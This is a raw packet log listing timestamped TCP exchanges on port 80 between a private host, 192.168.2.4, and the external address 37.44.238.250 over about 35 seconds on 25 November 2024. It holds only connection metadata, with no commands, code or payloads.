Nov 25, 2024 22:39:00.686033964 CET	80	49929	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:00.731904984 CET	80	49930	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:00.732014894 CET	49930	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:00.732181072 CET	49930	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:00.811156034 CET	80	49927	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:00.811233997 CET	49927	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:00.853003979 CET	80	49930	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:00.911456108 CET	49929	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:01.031593084 CET	80	49929	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:01.031868935 CET	80	49929	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:01.083334923 CET	49930	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:01.203435898 CET	80	49930	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:01.836116076 CET	80	49929	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:02.002795935 CET	80	49930	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:02.020755053 CET	49929	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:02.072416067 CET	80	49929	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:02.208304882 CET	49930	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:02.208312988 CET	49929	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:02.236143112 CET	80	49930	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:02.317723036 CET	49930	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:02.361335993 CET	49929	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:02.361372948 CET	49930	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:02.361982107 CET	49935	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:02.481831074 CET	80	49929	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:02.482072115 CET	80	49935	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:02.482188940 CET	49929	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:02.482217073 CET	49935	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:02.482335091 CET	49935	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:02.482373953 CET	80	49930	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:02.482425928 CET	49930	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:02.602375984 CET	80	49935	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:02.833446980 CET	49935	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:02.953527927 CET	80	49935	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:03.753012896 CET	80	49935	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:03.817658901 CET	49935	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:03.988020897 CET	80	49935	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:04.112812042 CET	49935	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:04.113400936 CET	49940	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:04.233450890 CET	80	49940	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:04.233509064 CET	80	49935	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:04.233743906 CET	49940	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:04.233743906 CET	49935	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:04.233839035 CET	49940	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:04.354196072 CET	80	49940	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:04.583486080 CET	49940	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:04.703470945 CET	80	49940	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:05.555175066 CET	80	49940	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:05.598895073 CET	49940	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:05.797131062 CET	80	49940	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:05.848901033 CET	49940	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:05.932900906 CET	49922	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:05.937068939 CET	49940	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:05.944128990 CET	49945	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:06.058053970 CET	80	49940	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:06.058128119 CET	49940	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:06.064287901 CET	80	49945	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:06.064363003 CET	49945	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:06.064502001 CET	49945	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:06.184408903 CET	80	49945	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:06.411465883 CET	49945	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:06.531505108 CET	80	49945	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:07.084326982 CET	49949	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:07.084510088 CET	49945	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:07.204586983 CET	80	49949	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:07.204760075 CET	49949	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:07.205003977 CET	49949	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:07.205236912 CET	80	49945	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:07.205321074 CET	49945	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:07.206789017 CET	49950	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:07.324949980 CET	80	49949	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:07.326792002 CET	80	49950	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:07.326884031 CET	49950	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:07.327022076 CET	49950	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:07.447163105 CET	80	49950	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:07.552138090 CET	49949	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:07.672559023 CET	80	49949	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:07.672789097 CET	80	49949	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:07.677093029 CET	49950	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:07.797527075 CET	80	49950	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:08.520864010 CET	80	49949	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:08.567667007 CET	49949	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:08.643007040 CET	80	49950	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:08.692730904 CET	49950	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:08.765124083 CET	80	49949	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:08.817686081 CET	49949	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:08.889187098 CET	80	49950	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:08.942686081 CET	49950	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:09.006036043 CET	49949	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:09.006040096 CET	49950	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:09.006504059 CET	49955	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:09.126373053 CET	80	49950	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:09.126450062 CET	49950	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:09.126540899 CET	80	49955	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:09.126607895 CET	49955	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:09.126729012 CET	49955	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:09.126842976 CET	80	49949	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:09.126893044 CET	49949	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:09.246563911 CET	80	49955	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:09.474039078 CET	49955	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:09.594172955 CET	80	49955	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:10.473658085 CET	80	49955	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:10.520917892 CET	49955	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:10.717084885 CET	80	49955	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:10.770782948 CET	49955	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:10.887867928 CET	49960	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:11.007957935 CET	80	49960	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:11.008048058 CET	49960	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:11.008160114 CET	49960	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:11.128237963 CET	80	49960	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:11.364787102 CET	49960	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:11.484987974 CET	80	49960	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:12.299175024 CET	80	49960	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:12.348942041 CET	49960	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:12.536063910 CET	80	49960	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:12.583411932 CET	49960	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:12.660933971 CET	49955	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:12.663536072 CET	49960	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:12.663808107 CET	49965	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:12.784993887 CET	80	49960	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:12.785064936 CET	49960	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:12.785306931 CET	80	49965	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:12.785397053 CET	49965	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:12.785491943 CET	49965	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:12.905952930 CET	80	49965	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:13.134188890 CET	49965	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:13.254653931 CET	80	49965	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:13.771831989 CET	49968	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:13.772068024 CET	49965	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:13.892041922 CET	80	49968	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:13.892141104 CET	49968	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:13.892232895 CET	49968	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:13.892719030 CET	80	49965	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:13.892781019 CET	49965	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:13.899202108 CET	49969	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:14.013243914 CET	80	49968	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:14.019306898 CET	80	49969	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:14.019376993 CET	49969	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:14.019562006 CET	49969	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:14.139512062 CET	80	49969	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:14.240366936 CET	49968	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:14.360393047 CET	80	49968	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:14.360596895 CET	80	49968	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:14.365680933 CET	49969	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:14.485723972 CET	80	49969	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:15.211139917 CET	80	49968	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:15.255182981 CET	49968	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:15.335623026 CET	80	49969	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:15.380187035 CET	49969	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:15.453197956 CET	80	49968	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:15.567694902 CET	49968	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:15.581090927 CET	80	49969	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:15.630201101 CET	49969	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:15.705240011 CET	49968	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:15.705307961 CET	49969	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:15.705856085 CET	49975	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:15.826364994 CET	80	49975	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:15.826452017 CET	49975	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:15.826538086 CET	49975	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:15.826951981 CET	80	49968	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:15.826984882 CET	80	49969	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:15.827007055 CET	49968	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:15.827038050 CET	49969	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:15.946904898 CET	80	49975	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:16.177115917 CET	49975	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:16.297230959 CET	80	49975	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:17.189903021 CET	80	49975	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:17.293359041 CET	49975	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:17.462886095 CET	80	49975	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:17.540671110 CET	49975	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:17.586509943 CET	49975	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:17.587297916 CET	49980	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:17.707158089 CET	80	49975	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:17.707228899 CET	49975	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:17.707285881 CET	80	49980	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:17.707357883 CET	49980	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:17.707453966 CET	49980	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:17.827528954 CET	80	49980	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:18.052196026 CET	49980	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:18.172250032 CET	80	49980	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:19.027400970 CET	80	49980	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:19.162220955 CET	49980	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:19.269145966 CET	80	49980	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:19.399864912 CET	49980	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:19.400789022 CET	49985	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:19.521231890 CET	80	49980	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:19.521260977 CET	80	49985	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:19.521286964 CET	49980	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:19.521351099 CET	49985	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:19.521553040 CET	49985	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:19.642414093 CET	80	49985	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:19.880289078 CET	49985	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:20.000196934 CET	80	49985	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:20.459639072 CET	49988	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:20.460051060 CET	49985	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:20.579523087 CET	80	49988	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:20.580312014 CET	80	49985	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:20.580933094 CET	49985	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:20.580935001 CET	49988	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:20.582226992 CET	49988	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:20.585131884 CET	49989	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:20.702095985 CET	80	49988	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:20.705192089 CET	80	49989	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:20.706459999 CET	49989	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:20.706459999 CET	49989	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:20.826482058 CET	80	49989	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:20.927175999 CET	49988	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:21.047154903 CET	80	49988	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:21.047226906 CET	80	49988	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:21.053631067 CET	49989	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:21.173537970 CET	80	49989	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:21.897013903 CET	80	49988	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:21.975863934 CET	80	49989	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:22.067739010 CET	49988	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:22.145314932 CET	80	49988	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:22.161539078 CET	49989	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:22.208544970 CET	80	49989	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:22.258239985 CET	49988	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:22.329075098 CET	49989	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:22.329077959 CET	49988	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:22.330080986 CET	49995	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:22.449610949 CET	80	49989	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:22.449629068 CET	80	49988	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:22.449721098 CET	49989	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:22.449724913 CET	49988	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:22.449987888 CET	80	49995	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:22.450236082 CET	49995	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:22.450330019 CET	49995	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:22.570219994 CET	80	49995	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:22.802197933 CET	49995	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:22.922116041 CET	80	49995	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:23.814040899 CET	80	49995	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:23.864613056 CET	49995	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:24.066232920 CET	80	49995	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:24.195261002 CET	49995	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:24.196103096 CET	50000	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:24.315710068 CET	80	49995	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:24.316030979 CET	80	50000	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:24.316142082 CET	49995	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:24.316142082 CET	50000	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:24.316431999 CET	50000	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:24.436244011 CET	80	50000	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:24.661562920 CET	50000	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:24.781575918 CET	80	50000	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:25.696994066 CET	80	50000	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:25.770915985 CET	50000	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:25.954508066 CET	80	50000	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:26.067738056 CET	50000	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:26.091131926 CET	50000	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:26.091801882 CET	50004	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:26.211774111 CET	80	50004	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:26.211915016 CET	50004	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:26.212064028 CET	50004	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:26.212421894 CET	80	50000	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:26.212488890 CET	50000	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:26.332153082 CET	80	50004	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:26.568065882 CET	50004	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:26.688004017 CET	80	50004	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:27.147120953 CET	50004	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:27.147123098 CET	50009	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:27.267716885 CET	80	50004	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:27.267774105 CET	80	50009	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:27.267801046 CET	50004	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:27.267843008 CET	50009	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:27.268057108 CET	50009	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:27.275208950 CET	50010	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:27.391184092 CET	80	50009	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:27.395854950 CET	80	50010	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:27.395934105 CET	50010	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:27.396212101 CET	50010	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:27.516565084 CET	80	50010	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:27.614785910 CET	50009	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:27.736052036 CET	80	50009	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:27.736063957 CET	80	50009	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:27.755354881 CET	50010	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:27.875566006 CET	80	50010	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:28.599040031 CET	80	50009	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:28.661576033 CET	50009	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:28.713279963 CET	80	50010	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:28.841114044 CET	80	50009	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:28.864645958 CET	50010	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:28.958699942 CET	80	50010	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:29.052138090 CET	50009	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:29.052196980 CET	50010	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:29.080558062 CET	50009	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:29.080816984 CET	50010	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:29.081314087 CET	50014	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:29.200880051 CET	80	50009	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:29.201082945 CET	50009	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:29.201303959 CET	80	50014	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:29.201323032 CET	80	50010	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:29.201395988 CET	50010	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:29.201400042 CET	50014	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:29.201534033 CET	50014	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:29.321371078 CET	80	50014	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:29.552237034 CET	50014	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:29.672354937 CET	80	50014	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:30.470933914 CET	80	50014	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:30.567816019 CET	50014	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:30.704149008 CET	80	50014	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:30.756398916 CET	50014	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:30.830435038 CET	50020	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:30.950319052 CET	80	50020	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:30.952478886 CET	50020	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:30.956665039 CET	50020	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:31.076509953 CET	80	50020	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:31.302217007 CET	50020	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:31.422116995 CET	80	50020	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:32.296842098 CET	80	50020	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:32.364655972 CET	50020	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:32.533099890 CET	80	50020	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:32.657465935 CET	50020	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:32.658288956 CET	50023	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:32.778007984 CET	80	50020	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:32.778084040 CET	50020	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:32.778258085 CET	80	50023	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:32.781689882 CET	50023	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:32.781739950 CET	50023	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:32.901652098 CET	80	50023	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:33.130424023 CET	50023	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:33.250358105 CET	80	50023	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:33.850570917 CET	50029	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:33.850876093 CET	50023	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:33.970446110 CET	80	50029	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:33.970670938 CET	50029	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:33.970741034 CET	50029	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:33.971194029 CET	80	50023	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:33.971259117 CET	50023	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:33.971374989 CET	50030	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:34.090756893 CET	80	50029	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:34.091320038 CET	80	50030	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:34.091495037 CET	50030	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:34.091527939 CET	50030	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:34.211453915 CET	80	50030	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:34.318409920 CET	50029	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:34.438446999 CET	80	50029	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:34.438530922 CET	80	50029	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:34.446309090 CET	50030	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:34.566340923 CET	80	50030	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:35.292526007 CET	80	50029	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:35.412062883 CET	80	50030	37.44.238.250	192.168.2.4
